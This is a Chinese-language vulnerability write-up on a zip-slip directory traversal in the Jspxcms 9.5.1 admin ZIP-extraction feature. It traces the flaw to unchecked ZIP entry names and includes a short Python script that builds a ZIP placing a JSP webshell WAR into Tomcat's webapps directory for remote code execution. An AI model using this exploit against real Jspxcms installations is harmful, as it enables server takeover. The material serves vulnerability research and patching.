Jspxcms-9.5.1由zip解压功能导致的目录穿越漏洞分析
Jspxcms 是企业级开源网站内容管理系统,支持多组织、多站点、独立管理的网 站群,也支持 Oracle、SQL Server、MySQL 等数据库。
Jspxcms-9.5.1 及之前版本的后台 ZIP 文件解压功能存在目录穿越漏洞,攻击者可以利用该漏洞,构造包含恶意 WAR 包的 ZIP 文件,达到 Getshell 的破坏效果
环境配置
在 MySQL 中创建数据库,字符集选择为utf8或者utf8mb4(支持更多特殊字符如表情字符 emoji,推荐)。
执行数据库脚本。数据库脚本在database目录下。
create database jspxcms;
use jspxcms;
source mysql.sql;
找到 Tomcat 的安装目录,将 webapps 目录下 ROOT 文件夹删除(也可将webapps 目录下所有文件夹都删除)。建议使用干净的 Tomcat,不要部署其它应用。将下载包中的 ROOT 文件夹拷贝到 tomcat/webapps 目录下。
打开/ROOT/WEB-INF/classes/application.propertis文件,根据实际情况修改
spring.datasource.url、spring.datasource.username、spring.datasource.password
的值。
双击 tomcat/bin/startup.bat 文件启动即可
漏洞分析
后台http://192.168.111.140:8080/cmscp/index.do admin 默认密码为空
使用 Burp Suite 进行抓包可以发现“解压文件”的接口调用情况
该接口对应 jspxcms-9.5.1-release-src/src/main/java/com/jspxcms/core/web/back/WebFileUploadsController.java 的 unzip 方法
对 unzip 方法进行跟进,发现它的具体实现在/jspxcms-9.5.1-release-src/src/main/java/com/jspxcms/core/web/back/WebFileControllerAbstractor.java 中。在对 ZIP文件进行解压时,程序调用了 AntZipUtil 类的 unzip 方法
对 AntZipUtil 类的 unzip 方法进行跟进,可发现该方法未对 ZIP 压缩包中的文件名进行参数校验就进行文件的写入。这样的代码写法会引发“目录穿越漏洞”:
代码中使用
entry.getName()获取 ZIP 条目的名称,并将其用作目标文件的路径
漏洞利用
创建包含jsp webshell的war包:
制作恶意 ZIP 文件
import zipfile
if __name__ == "__main__":
try:
binary = b'test'
zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("test.zip")
with open('shell.war', 'rb') as file:
binary_data = file.read()
zipFile.writestr("../../../shell.war", binary_data)
zipFile.close()
except IOError as e:
raise e
上传文件
点击ZIP解压,shell.war就被解压到了webapps目录
